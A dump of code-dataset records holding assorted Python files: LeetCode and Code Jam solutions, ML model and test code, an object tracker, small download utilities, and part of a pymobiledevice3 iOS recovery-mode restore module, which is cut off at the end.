plt.show()\n\n return float(np.mean(sen[np.logical_not(idx_zeros)]))\n","repo_name":"mcv-m6-video/mcv-m6-2019-team5","sub_path":"w1_w2/metrics/msen.py","file_name":"msen.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72565307714","text":"from typing import List\n\nclass Solution:\n def maxProduct(self, nums: List[int]) -> int:\n \n \n def dp( i ):\n \n if i == 0:\n # Base case on index 0\n # min value, max value, max product are first value in 
array\n return nums[0], nums[0], nums[0]\n \n \n ## General cases\n \n prev_min, prev_max, prev_product = dp(i-1)\n \n # local max comes from product of two positive numbers, or product of two negative numbers\n candidate = [prev_min * nums[i], prev_max * nums[i], nums[i] ]\n cur_min = min( candidate )\n cur_max = max( candidate )\n product = max(prev_product, cur_max)\n \n return cur_min, cur_max, product\n \n # ----------------------------------------\n return dp( len(nums)-1 )[2]\n\nimport unittest\n\nclass Testing( unittest.TestCase ):\n\n def test_case_1( self ):\n\n result = Solution().maxProduct( nums=[2,3,-2,4] )\n self.assertEqual(result, 6)\n\n\n def test_case_2( self ):\n\n result = Solution().maxProduct( nums=[-2,0,-1] )\n self.assertEqual(result, 0)\n\n\nif __name__ == '__main__':\n\n unittest.main()","repo_name":"brianchiang-tw/leetcode","sub_path":"Dynamic_Programming_I/Maximum Product Subarray/by_recursion_memo.py","file_name":"by_recursion_memo.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"18614960365","text":"# -*- coding: utf-8 -*-\n\nimport pytest\n\nimport pickle\n\nimport tensorflow as tf\n\nfrom inferbeddings.lm.loader2 import SNLILoader\nfrom inferbeddings.lm.model import LanguageModel\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef test_lm_snli_overfit():\n checkpoint_path = 'models/snli/dam_1/dam_1'\n vocabulary_path = 'models/snli/dam_1/dam_1_index_to_token.p'\n\n with open(vocabulary_path, 'rb') as f:\n index_to_token = pickle.load(f)\n token_to_index = {token: index for index, token in index_to_token.items()}\n\n vocab_size = len(token_to_index)\n embedding_size = 300\n rnn_size = 64\n num_epochs = 10\n\n learning_rate = 0.1\n\n config = {\n 'model': 'lstm',\n 'seq_length': 4,\n 'batch_size': 8,\n 'vocab_size': vocab_size,\n 'embedding_size': embedding_size,\n 'rnn_size': rnn_size,\n 'num_layers': 1\n }\n\n loader = SNLILoader(path='data/snli/tiny/one.jsonl.gz',\n token_to_index=token_to_index,\n batch_size=config['batch_size'],\n seq_length=config['seq_length'],\n shuffle=True)\n\n loader.create_batches()\n\n discriminator_scope_name = 'discriminator'\n with tf.variable_scope(discriminator_scope_name):\n embedding_layer = tf.get_variable('embeddings',\n shape=[vocab_size + 3, embedding_size],\n initializer=tf.contrib.layers.xavier_initializer(),\n trainable=False)\n\n lm_scope_name = 'language_model'\n with tf.variable_scope(lm_scope_name) as scope:\n model = LanguageModel(model=config['model'],\n seq_length=config['seq_length'],\n batch_size=config['batch_size'],\n rnn_size=config['rnn_size'],\n num_layers=config['num_layers'],\n vocab_size=config['vocab_size'],\n embedding_layer=embedding_layer,\n infer=False)\n\n scope.reuse_variables()\n imodel = LanguageModel(model=config['model'],\n seq_length=config['seq_length'],\n batch_size=config['batch_size'],\n rnn_size=config['rnn_size'],\n num_layers=config['num_layers'],\n vocab_size=config['vocab_size'],\n embedding_layer=embedding_layer,\n infer=True)\n\n optimizer = tf.train.AdagradOptimizer(learning_rate)\n train_op = optimizer.minimize(model.cost)\n\n init_op = tf.global_variables_initializer()\n\n emb_saver = tf.train.Saver([embedding_layer], max_to_keep=1)\n\n with tf.Session() as session:\n session.run(init_op)\n\n emb_saver.restore(session, checkpoint_path)\n\n for epoch_id in range(0, num_epochs):\n logger.debug('Epoch: {}'.format(epoch_id))\n\n 
loader.reset_batch_pointer()\n state = session.run(model.initial_state)\n\n for batch_id in range(loader.pointer, loader.num_batches):\n x, y = loader.next_batch()\n\n feed_dict = {\n model.input_data: x,\n model.targets: y,\n model.initial_state: state\n }\n\n loss_value = session.run(model.cost, feed_dict=feed_dict)\n state = session.run(model.final_state, feed_dict=feed_dict)\n _ = session.run(train_op, feed_dict=feed_dict)\n\n print(loss_value)\n\n sample_value = imodel.sample(session, index_to_token, token_to_index,\n 10, 'A', 0, 1, 4)\n print(sample_value)\n\nif __name__ == '__main__':\n pytest.main([__file__])\n","repo_name":"uclnlp/inferbeddings","sub_path":"tests/inferbeddings/lm/test_overfit.py","file_name":"test_overfit.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"61"} +{"seq_id":"30942861775","text":"import urllib2\nimport re\n\nfrom urllib import FancyURLopener\nclass MyOpener(FancyURLopener):\n version = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11'\n\npage = urllib2.urlopen(\"http://magiccards.info/query?q=dark+ritual&v=card&s=cname\")\npattern = re.compile('http://magiccards.info/scans/.*\"')\n\nbytes_to_read = 1000\nwhile 1:\n matches = pattern.findall(page.read(bytes_to_read))\n if len(matches) == 1:\n image_url = matches[0].strip('\"')\n browser = MyOpener()\n browser.retrieve(image_url, 'carta.jpg')\n break\n else:\n bytes_to_read += 1000\n","repo_name":"agelgustavo/houc","sub_path":"scripts/imageDownloader.py","file_name":"imageDownloader.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12451602707","text":"#!/usr/bin/python\n\nimport vot\nimport sys\nimport time\nimport cv2\nimport numpy\nimport collections\nimport numpy as np\n\n\nclass VCTracker(object):\n\n def __init__(self, image, region):\n self.window = max(region.width, region.height) * 2\n\n left = max(region.x, 0)\n top = max(region.y, 0)\n\n right = min(region.x + region.width, image.shape[1] - 1)\n bottom = min(region.y + region.height, image.shape[0] - 1)\n\n # Initial template\n self.template = image[int(top):int(bottom), int(left):int(right)]\n # Center position of the template (u,v)\n self.position = (region.x + region.width / 2, region.y + region.height / 2)\n # Size of the template (width, height)\n self.size = (region.width, region.height)\n\n # Use these lines for testing.\n # Comment them when you evaluate with the vot toolkit\n im = cv2.rectangle(image, (int(left), int(top)), (int(right), int(bottom)), (255, 0, 0), 2)\n cv2.imshow('result', im)\n cv2.imshow('template', self.template)\n cv2.waitKey(1) # change 0 to 1 - remove waiting for key press\n\n # *******************************************************************\n # This is the function to fill. 
You can also modify the class and add additional\n # helper functions and members if needed\n # It should return, in this order, the u (col) and v (row) coordinates of the top left corner\n # the width and the height of the bounding box\n # *******************************************************************\n def track(self, image):\n # Fill here the function\n # You have the information in self.template, self.position and self.size\n # You can update them and add other variables\n\n left = max(0, int(self.position[0] - self.size[0]))\n top = max(0, int(self.position[1] - self.size[1]))\n right = min(image.shape[1] - 1, int(self.position[0] + self.size[0]))\n bottom = min(image.shape[0] - 1, int(self.position[1] + self.size[1]))\n\n smallerImage = image[int(top):int(bottom), int(left):int(right)]\n res = cv2.matchTemplate(smallerImage, self.template, cv2.TM_CCOEFF_NORMED)\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n\n left = left + max_loc[0]\n top = top + max_loc[1]\n self.position = (left + float(self.size[0]) / 2, top + float(self.size[1]) / 2)\n\n confidence = max_val\n\n nextLeft = max(left, 0)\n nextTop = max(top, 0)\n nextRight = min(left + self.size[0], image.shape[1] - 1)\n nextBottom = min(top + self.size[1], image.shape[0] - 1)\n self.template = image[int(nextTop):int(nextBottom), int(nextLeft):int(nextRight)]\n\n return vot.Rectangle(left, top, self.size[0], self.size[1]), confidence\n\n\n# *****************************************\n# VOT: Create VOT handle at the beginning\n# Then get the initializaton region\n# and the first image\n# *****************************************\nhandle = vot.VOT(\"rectangle\")\nselection = handle.region()\n\n# Process the first frame\nimagefile = handle.frame()\nif not imagefile:\n sys.exit(0)\nimage = cv2.imread(imagefile)\n\n# Initialize the tracker\ntracker = VCTracker(image, selection)\n\nwhile True:\n # *****************************************\n # VOT: Call frame method to get path of the\n # current image frame. 
If the result is\n # null, the sequence is over.\n # *****************************************\n imagefile = handle.frame()\n if not imagefile:\n break\n image = cv2.imread(imagefile)\n\n # Track the object in the image \n region, confidence = tracker.track(image)\n\n # Use these lines for testing.\n # Comment them when you evaluate with the vot toolkit\n im = cv2.rectangle(image, (int(region.x), int(region.y)),\n (int(region.x + region.width), int(region.y + region.height)), (255, 0, 0), 2)\n cv2.imshow('result', im)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # *****************************************\n # VOT: Report the position of the object\n # every frame using report method.\n # *****************************************\n handle.report(region, confidence)\n","repo_name":"AlvaroNavarroMora/RVA_VisionChallenge","sub_path":"tracker/vision_challenge_tracker.py","file_name":"vision_challenge_tracker.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41942131831","text":"from unittest import TestCase\nfrom logic.language import PropositionalConstant, PropositionalVocabulary\nfrom logic.syntax import Negation, SimpleSentence\nfrom logic.display import TruthTable\n\nclass TruthTableTest(TestCase):\n def test_basic_simple_string(self):\n vocab = PropositionalVocabulary([PropositionalConstant(\"a\")])\n table = TruthTable(vocab)\n\n result = table.simple_string\n\n self.assertEqual(\n\"\"\"+---+\n| a |\n+---+\n| 1 |\n| 0 |\n+---+\"\"\", result)\n\n def test_larger_simple_string(self):\n a_constant = PropositionalConstant(\"a\")\n vocab = PropositionalVocabulary([\n a_constant,\n PropositionalConstant(\"b\")\n ])\n table = TruthTable(vocab, [Negation(SimpleSentence(a_constant))])\n\n result = table.simple_string\n\n self.assertEqual(\n\"\"\"+---+---+----+\n| a | b | -a |\n+---+---+----+\n| 1 | 1 | 0 |\n| 1 | 0 | 0 |\n| 0 | 1 | 1 |\n| 0 | 0 | 1 |\n+---+---+----+\"\"\", result)\n\n def test_basic_matrix(self):\n constant_a = PropositionalConstant(\"a\")\n vocab = PropositionalVocabulary([constant_a])\n table = TruthTable(vocab)\n\n result = table.matrix\n\n self.assertEqual([[SimpleSentence(constant_a), True, False]], result)\n\n def test_larger_matrix(self):\n a_constant = PropositionalConstant(\"a\")\n b_constant = PropositionalConstant(\"b\")\n negation_a = Negation(SimpleSentence(a_constant))\n vocab = PropositionalVocabulary([a_constant, b_constant])\n table = TruthTable(vocab, [negation_a])\n\n result = table.matrix\n\n self.assertEqual([\n [SimpleSentence(a_constant), True, True, False, False],\n [SimpleSentence(b_constant), True, False, True, False],\n [negation_a, False, False, True, True]\n ], result)","repo_name":"danielholmes/logic","sub_path":"tests/test_display.py","file_name":"test_display.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23395779001","text":"def square_root(num):\n\tx = num\n\ty = (x + num // x) // 2\n\twhile y < x:\n\t\tx = y\n\t\ty = (x + num // x) //2\n\treturn x\n\ndef is_fair_and_square(num):\n\treturn (str(num) == str(num)[::-1]) and (square_root(num)**2 == num) and (str(square_root(num)) == str(square_root(num))[::-1])\n\t\n\ndef find_fair_and_square(lower_bound, upper_bound):\n\ti = lower_bound\n\tfairs_and_squares = []\n\twhile i <= upper_bound:\n\t\tif is_fair_and_square(i):\n\t\t\tfairs_and_squares.append(i)\n\t\ti = i + 1\n\treturn 
len(fairs_and_squares)\n\nfrom sys import argv\nscript, input_file, output_file = argv\n\ninput_data = open(input_file)\noutput_data = open(output_file, 'w')\nnum_cases = int(input_data.readline())\ni = 0\n\nwhile i < num_cases:\n\tinput_line = input_data.readline().split()\n\tlower_bound = input_line[0]\n\tupper_bound = input_line[1]\n\tresult = find_fair_and_square(int(lower_bound), int(upper_bound))\n\toutput_data.write(\"Case #%s: %d\\n\" % (i + 1, result))\n\ti = i + 1\noutput_data.close()\n\t","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/2793.py","file_name":"2793.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5039633262","text":"# miner/modules/partial_ner.py\n\nimport logging\nfrom typing import Optional, Literal\n\nimport torch\nimport torch.nn as nn\nimport transformers\nfrom transformers import RobertaModel\n\nfrom miner.modules.partial_crf import PartialCRF\n\n\nclass PartialNER(nn.Module):\n \"\"\"Partial Named Entity Recognizer (NER) Model.\n\n This class defines a Partial NER model for named entity recognition tasks.\n It extends the PyTorch ``nn.Module`` class and integrates with the\n **Hugging Face** ``transformers`` library for handling pre-trained language\n models.\n\n Parameters\n ----------\n lm_path: str\n The path or identifier of a pre-trained language model checkpoint.\n num_labels: int\n The number of unique labels or tags for NER.\n device: str, {\"cpu\", \"cuda\"}\n The device on which the model will be instantiated (\"cpu\" or \"cuda\").\n dropout: float\n The dropout probability to apply to the model's hidden states.\n q: float, optional\n The q-value for the partial CRF layer. If None, no partial CRF is used.\n padding_idx : Optional[int], optional\n The padding index for the input sequences. 
If None, the default index\n is used.\n\n Attributes\n ----------\n device: str\n The device on which the model is instantiated.\n transformer: transformers.RobertaModel\n The pre-trained transformer model used for feature extraction.\n linear_dropout: nn.Dropout\n The dropout layer applied to the model's linear layer.\n fc: nn.Linear\n The linear layer mapping features to label scores.\n crf: PartialCRF\n The partial conditional random field layer for structured prediction.\n \"\"\"\n\n def __init__(\n self, lm_path: str, num_labels: int, device: Literal[\"cpu\", \"cuda\"],\n dropout: float, q: Optional[float]=None,\n padding_idx: Optional[int]=None\n ):\n super(PartialNER, self).__init__()\n self.device = device\n logging.info(f\"Loading LM checkpoint from {lm_path}\")\n self.transformer = RobertaModel.from_pretrained(lm_path)\n self.linear_dropout = nn.Dropout(dropout)\n self.fc = nn.Linear(768, num_labels) # (batch_size, max_length, num_labels)\n self.crf = PartialCRF(\n num_tags=num_labels,\n device=device,\n q=q,\n padding_idx=padding_idx\n )\n\n def forward(\n self, inputs: transformers.BatchEncoding,\n inputs_augmented: transformers.BatchEncoding,\n outputs: torch.LongTensor,\n loss_fn: Optional[Literal[\"nll\", \"c_nll\", \"gce\"]]=None\n ):\n \"\"\"Performs the forward pass.\n\n Parameters\n ----------\n inputs: transformer.BatchEncoding\n Original sentence, tokenized with ``transformers``.\n inputs_augmented: torch.BatchEncoding\n Language augmented input, tokenized with ``transformers``.\n outputs: torch.LongTensor\n List of true labels.\n loss_fn: str, {\"nll\", \"c_nll\", \"gce\"}, optional\n The desired loss function to use.\n\n Returns\n -------\n torch.FloatTensor\n Sum over the loss of the original input and the augmented input.\n \"\"\"\n h = self.transformer(**inputs).last_hidden_state\n logits = self.fc(self.linear_dropout(h))\n loss = self.crf(\n emissions=logits,\n tags=outputs,\n mask=inputs[\"attention_mask\"],\n loss_fn=\"nll\" if loss_fn is None else loss_fn\n )\n h_augmented = self.transformer(**inputs_augmented).last_hidden_state\n logits_augmented = self.fc(self.linear_dropout(h_augmented))\n loss_augmented = self.crf(\n emissions=logits_augmented,\n tags=outputs,\n mask=inputs_augmented[\"attention_mask\"],\n loss_fn=\"nll\" if loss_fn is None else loss_fn\n )\n return loss + loss_augmented\n\n @torch.inference_mode()\n def viterbi_decode(self, inputs: transformers.BatchEncoding):\n \"\"\"Computes the mostly likely label sequence.\n\n Parameters\n ----------\n inputs: transformers.BatchEncoding\n Input sentence tokenized with ``transformers``.\n\n Returns\n -------\n outputs: List[List[int]]\n Most likely tag sequence of each input in the batch.\n \"\"\"\n h = self.transformer(**inputs).last_hidden_state\n logits = self.fc(self.linear_dropout(h))\n outputs = self.crf.viterbi_decode(\n logits,\n mask=inputs[\"attention_mask\"]\n )\n return outputs\n\n @torch.inference_mode()\n def marginal_probabilities(self, inputs: transformers.BatchEncoding):\n \"\"\"Computes the marginal probability of each token of a given sequence\n to belong to a class.\n\n Parameters\n ----------\n inputs: transformers.BatchEncoding\n Input sentence tokenized with ``transformers``.\n\n Returns\n -------\n p: torch.FloatTensor\n Marginal probabilities. 
(batch_size, sequence_length, num_tags).\n\n \"\"\"\n h = self.transformer(**inputs).last_hidden_state\n logits = self.fc(self.linear_dropout(h))\n p = self.crf.marginal_probabilities(\n logits,\n mask=inputs[\"attention_mask\"]\n ).transpose(0, 1)\n return p\n\n","repo_name":"Madjakul/MiNER","sub_path":"miner/modules/partial_ner.py","file_name":"partial_ner.py","file_ext":"py","file_size_in_byte":5354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30504286925","text":"n1=float(input('Enter First number: '))\r\nn2=float(input(\"Enter second Number: \"))\r\nopr=input(\"+,/,-,* Enter any one operator: \")\r\nif opr==\"+\":\r\n print(\"Addition: \",n1+n2)\r\nelif opr==\"-\":\r\n print(\"Subtraction: \",n1-n2)\r\nelif opr==\"*\":\r\n print(\"Multiplication: \",n1*n2)\r\nelif opr==\"/\":\r\n print(\"Division: \",n1/n2)\r\nelse:\r\n print(\"Invalid operator\")","repo_name":"anshuman2197/Python-Internshala","sub_path":"prob5.py","file_name":"prob5.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5895868208","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import filedialog, messagebox\n\nimport youtube_dl\n\n\ndef LocationFunc(location):\n down_Directory = filedialog.askdirectory(\n initialdir ='Home', title = 'Save video')\n location.set(down_Directory)\n\ndef DownloadFunc(linkVideo,location, my_hook):\n if linkVideo.get() != '':\n ydl_opts = {\n 'outtmpl':f'{location.get()}/%(title)s-%(id)s.%(ext)s',\n 'format': 'bestvideo[ext=mp4]+bestaudio[ext=mp4]/best',\n 'progress_hooks': [my_hook],\n }\n\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n try:\n ydl.download([linkVideo.get()])\n except:\n messagebox.showinfo(\"Error\", \"Link video invalid\")\n \n else:\n messagebox.showinfo(\"Error\", \"Link video should not be EMPTY\")\n\n\n\n","repo_name":"matchamochiiiii/appdown","sub_path":"logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17923909997","text":"import hashlib\nimport logging\nimport time\nimport typing\nfrom zipfile import ZipFile\n\nfrom usb import USBError\n\nfrom pymobiledevice3.exceptions import PyMobileDevice3Exception\nfrom pymobiledevice3.irecv import IRecv, Mode\nfrom pymobiledevice3.lockdown import create_using_usbmux\nfrom pymobiledevice3.restore.base_restore import BaseRestore, Behavior\nfrom pymobiledevice3.restore.consts import lpol_file\nfrom pymobiledevice3.restore.device import Device\nfrom pymobiledevice3.restore.tss import TSSRequest\n\nRESTORE_VARIANT_ERASE_INSTALL = 'Erase Install (IPSW)'\nRESTORE_VARIANT_UPGRADE_INSTALL = 'Upgrade Install (IPSW)'\nRESTORE_VARIANT_MACOS_RECOVERY_OS = 'macOS Customer'\n\n\nclass Recovery(BaseRestore):\n def __init__(self, ipsw: ZipFile, device: Device, tss: typing.Mapping = None, behavior: Behavior = Behavior.Update):\n super().__init__(ipsw, device, tss, behavior, logger=logging.getLogger(__name__))\n self.tss_localpolicy = None\n self.tss_recoveryos_root_ticket = None\n self.restore_boot_args = None\n\n def reconnect_irecv(self, is_recovery=None):\n self.logger.debug('waiting for device to reconnect...')\n self.device.irecv = IRecv(ecid=self.device.ecid, is_recovery=is_recovery)\n self.logger.debug(f'connected mode: {self.device.irecv.mode}')\n\n def get_preboard_manifest(self):\n overrides = {\n '@APTicket': True,\n 
'ApProductionMode': 0,\n 'ApSecurityDomain': 0,\n }\n\n parameters = {\n 'ApProductionMode': False,\n 'ApSecurityMode': False,\n 'ApSupportsImg4': True,\n }\n\n self.build_identity.populate_tss_request_parameters(parameters)\n\n tss = TSSRequest()\n tss.add_common_tags(parameters, overrides)\n\n parameters['_OnlyFWComponents'] = True\n\n tss.add_ap_tags(parameters)\n\n return tss.img4_create_local_manifest(build_identity=self.build_identity)\n\n def get_tss_response(self):\n # populate parameters\n parameters = dict()\n\n parameters['ApECID'] = self.device.ecid\n if self.device.ap_nonce is not None:\n parameters['ApNonce'] = self.device.ap_nonce\n\n if self.device.sep_nonce is not None:\n parameters['ApSepNonce'] = self.device.sep_nonce\n\n parameters['ApProductionMode'] = True\n\n if self.device.is_image4_supported:\n parameters['ApSecurityMode'] = True\n parameters['ApSupportsImg4'] = True\n else:\n parameters['ApSupportsImg4'] = False\n\n self.build_identity.populate_tss_request_parameters(parameters)\n\n tss = TSSRequest()\n tss.add_common_tags(parameters)\n tss.add_ap_tags(parameters)\n\n # add personalized parameters\n if self.device.is_image4_supported:\n tss.add_ap_img4_tags(parameters)\n else:\n tss.add_ap_img3_tags(parameters)\n\n # normal mode; request baseband ticket as well\n if self.device.lockdown is not None:\n pinfo = self.device.preflight_info\n if pinfo:\n self.logger.debug('adding preflight info')\n\n node = pinfo.get('Nonce')\n if node is not None:\n parameters['BbNonce'] = node\n\n node = pinfo.get('ChipID')\n if node is not None:\n parameters['BbChipID'] = node\n\n node = pinfo.get('CertID')\n if node is not None:\n parameters['BbGoldCertId'] = node\n\n node = pinfo.get('ChipSerialNo')\n if node is not None:\n parameters['BbSNUM'] = node\n\n tss.add_baseband_tags(parameters)\n\n euiccchipid = pinfo.get('EUICCChipID')\n if euiccchipid:\n self.logger.debug('adding EUICCChipID info')\n parameters['eUICC,ChipID'] = euiccchipid\n\n if euiccchipid >= 5:\n node = pinfo.get('EUICCCSN')\n if node is not None:\n parameters['eUICC,EID'] = node\n\n node = pinfo.get('EUICCCertIdentifier')\n if node is not None:\n parameters['eUICC,RootKeyIdentifier'] = node\n\n node = pinfo.get('EUICCGoldNonce')\n if node is not None:\n parameters['EUICCGoldNonce'] = node\n\n node = pinfo.get('EUICCMainNonce')\n if node is not None:\n parameters['EUICCMainNonce'] = node\n\n tss.add_vinyl_tags(parameters)\n\n # send request and grab response\n return tss.send_receive()\n\n def get_local_policy_tss_response(self):\n # populate parameters\n parameters = {\n 'ApECID': self.device.ecid,\n 'Ap,LocalBoot': False,\n 'ApProductionMode': True,\n }\n\n if self.device.ap_nonce:\n parameters['ApNonce'] = self.device.ap_nonce\n\n sep_nonce = self.device.sep_nonce\n\n if sep_nonce:\n parameters['ApSepNonce'] = sep_nonce\n\n if self.device.is_image4_supported:\n parameters['ApSecurityMode'] = True\n parameters['ApSupportsImg4'] = True\n else:\n parameters['ApSupportsImg4'] = False\n\n self.build_identity.populate_tss_request_parameters(parameters)\n\n # Add Ap,LocalPolicy\n lpol = {\n 'Digest': hashlib.sha384(lpol_file).digest(),\n 'Trusted': True,\n }\n\n parameters['Ap,LocalPolicy'] = lpol\n\n # Add Ap,NextStageIM4MHash\n # Get previous TSS ticket\n ticket = self.tss.ap_img4_ticket\n # Hash it and add it as Ap,NextStageIM4MHash\n parameters['Ap,NextStageIM4MHash'] = hashlib.sha384(ticket).digest()\n\n # create basic request\n request = TSSRequest()\n\n # add common tags from manifest\n 
request.add_local_policy_tags(parameters)\n\n return request.send_receive()\n\n def get_recoveryos_root_ticket_tss_response(self):\n # populate parameters\n parameters = {\n 'ApECID': self.device.ecid,\n 'Ap,LocalBoot': False,\n 'ApProductionMode': True,\n }\n\n if self.device.ap_nonce:\n parameters['ApNonce'] = self.device.ap_nonce\n\n sep_nonce = self.device.sep_nonce\n\n if sep_nonce:\n parameters['ApSepNonce'] = sep_nonce\n\n if self.device.is_image4_supported:\n parameters['ApSecurityMode'] = True\n parameters['ApSupportsImg4'] = True\n else:\n parameters['ApSupportsImg4'] = False\n\n self.build_identity.populate_tss_request_parameters(parameters)\n\n # create basic request\n # Adds @HostPlatformInfo, @VersionInfo, @UUID\n request = TSSRequest()\n\n # add common tags from manifest\n # Adds Ap,OSLongVersion, AppNonce, @ApImg4Ticket\n request.add_ap_img4_tags(parameters)\n\n # add AP tags from manifest\n request.add_common_tags(parameters)\n\n # add AP tags from manifest\n # Fills digests & co\n request.add_ap_recovery_tags(parameters)\n\n return request.send_receive()\n\n def fetch_tss_record(self):\n if self.ipsw.build_manifest.build_major > 8:\n if self.device.ap_nonce is None:\n # the first nonce request with older firmware releases can fail, and it's OK\n self.logger.info('NOTE: Unable to get nonce from device')\n\n self.tss = self.get_tss_response()\n\n if self.macos_variant:\n self.tss_localpolicy = self.get_local_policy_tss_response()\n self.tss_recoveryos_root_ticket = self.get_recoveryos_root_ticket_tss_response()\n\n return self.tss\n\n def send_component(self, name: str):\n # Use a specific TSS ticket for the Ap,LocalPolicy component\n data = None\n tss = self.tss\n if name == 'Ap,LocalPolicy':\n tss = self.tss_localpolicy\n # If Ap,LocalPolicy => Inject an empty policy\n data = lpol_file\n\n data = self.build_identity.get_component(name, tss=tss, data=data).personalized_data\n self.logger.info(f'Sending {name} ({len(data)} bytes)...')\n self.device.irecv.send_buffer(data)\n\n def send_component_and_command(self, name, command):\n self.send_component(name)\n self.device.irecv.send_command(command)\n\n def send_ibec(self):\n component = 'iBEC'\n self.send_component(component)\n self.device.irecv.send_command('go', b_request=1)\n self.device.irecv.ctrl_transfer(0x21, 1)\n\n def send_applelogo(self, allow_missing=True):\n component = 'RestoreLogo'\n\n if not self.build_identity.has_component(component):\n if allow_missing:\n logging.warning(f'build_identity has no {component}')\n return\n else:\n raise PyMobileDevice3Exception(f'missing component: {component}')\n\n self.send_component(component)\n self.device.irecv.send_command('setpicture 4')\n self.device.irecv.send_command('bgcolor 0 0 0')\n\n def send_loaded_by_iboot(self):\n manifest = self.build_identity['Manifest']\n for key, node in manifest.items():\n iboot = node['Info'].get('IsLoadedByiBoot', False)\n iboot_stg1 = node['Info'].get('IsLoadedByiBootStage1', False)\n\n assert isinstance(iboot, bool)\n assert isinstance(iboot_stg1, bool)\n\n if iboot and not iboot_stg1:\n self.logger.debug(f'{key} is loaded by iBoot')\n self.send_component_and_command(key, 'firmware')\n\n def send_iboot_stage1_components(self):\n manifest = self.build_identity['Manifest']\n for key, node in manifest.items():\n iboot = node['Info'].get('IsLoadedByiBoot', False)\n iboot_stg1 = node['Info'].get('IsLoadedByiBootStage1', False)\n\n assert isinstance(iboot, bool)\n assert isinstance(iboot_stg1, bool)\n\n if iboot and iboot_stg1:\n 
self.logger.debug(f'{key} is loaded by iBoot Stage 1')\n self.send_component_and_command(key, 'firmware')\n\n def send_ramdisk(self):\n component = 'RestoreRamDisk'\n ramdisk_size = self.device.irecv.getenv('ramdisk-size')\n self.logger.info(f'ramdisk-size: {ramdisk_size}')\n\n self.send_component(component)\n ramdisk_delay = self.device.irecv.getenv('ramdisk-delay')\n self.logger.info(f'ramdisk-delay: {ramdisk_delay}')\n\n self.device.irecv.send_command('ramdisk')\n\n time.sleep(2)\n\n def send_kernelcache(self):\n component = 'RestoreKernelCache'\n\n self.send_component(component)\n try:\n self.device.irecv.ctrl_transfer(0x21, 1)\n except USBError:\n pass\n\n if self.restore_boot_args:\n self.device.irecv.send_command(f'setenv boot-args {self.restore_boot_args}')\n\n try:\n self.device.irecv.send_command('bootx', b_request=1)\n except USBError:\n pass\n\n def set_autoboot(self, enable: bool):\n self.device.irecv.set_autoboot(enable)\n\n def enter_restore(self):\n if self.ipsw.build_manifest.build_major >= 8:\n self.restore_boot_args = 'rd=md0 nand-enable-reformat=1 -progress'\n elif self.macos_variant:\n self.restore_boot_args = 'rd=md0 nand-enable-reformat=1 -progress -restore'\n\n # upload data to make device boot restore mode\n\n # Recovery Mode Environment:\n build_version = None\n while not build_version:\n self.logger.debug('build-version not yet supported. reconnecting...')\n time.sleep(1)\n\n # sometimes we manage to connect before iBEC actually started running\n build_version = self.device.irecv.getenv('build-version')\n self.reconnect_irecv()\n\n self.logger.info(f'iBoot build-version={build_version}')\n\n build_style = self.device.irecv.getenv('build-style')\n self.logger.info(f'iBoot build-style={build_style}')\n\n radio_error = self.device.irecv.getenv('radio-error')\n if radio_error:\n radio_error = int(radio_error)\n self.logger.info(f'radio-error: {radio_error}')\n radio_error_string = self.device.irecv.getenv('radio-error-string')\n if radio_error_string:\n self.logger.info(f'radio-error-string: {radio_error_string}')\n\n self.set_autoboot(False)\n\n # send logo and show it\n self.send_applelogo()\n\n # send components loaded by iBoot\n self.send_loaded_by_iboot()\n\n # send ramdisk and run it\n self.send_ramdisk()\n\n # send devicetree and load it\n self.send_component_and_command('RestoreDeviceTree', 'devicetree')\n\n if self.build_identity.has_component('RestoreSEP'):\n # attempt to send rsepfirmware and load it, otherwise continue\n try:\n self.send_component_and_command('RestoreSEP', 'rsepfirmware')\n except USBError:\n pass\n\n self.send_kernelcache()\n\n def dfu_enter_recovery(self):\n self.send_component('iBSS')\n self.reconnect_irecv()\n\n if 'SRTG' in self.device.irecv._device_info:\n raise PyMobileDevice3Exception('Device failed to enter recovery')\n\n if self.build_identity.build_manifest.build_major > 8:\n old_nonce = self.device.irecv.ap_nonce\n\n # reconnect\n self.reconnect_irecv()\n nonce = self.device.irecv.ap_nonce\n\n if old_nonce != nonce:\n # Welcome iOS5. 
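The build-version wait in enter_restore polls getenv and reconnects until a value appears, with no upper bound, so a dead device would hang the restore forever. A generic sketch of the same poll-and-reconnect pattern with a bounded attempt count; fetch and reconnect are caller-supplied callables and purely illustrative:

import time

def poll_until(fetch, reconnect, interval: float = 1.0, attempts: int = 30):
    """Poll fetch() until it returns a truthy value, reconnecting between tries."""
    for _ in range(attempts):
        value = fetch()
        if value:
            return value
        # The device-side service may not be up yet; wait, then re-establish the link.
        time.sleep(interval)
        reconnect()
    raise TimeoutError("device never reported a value")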
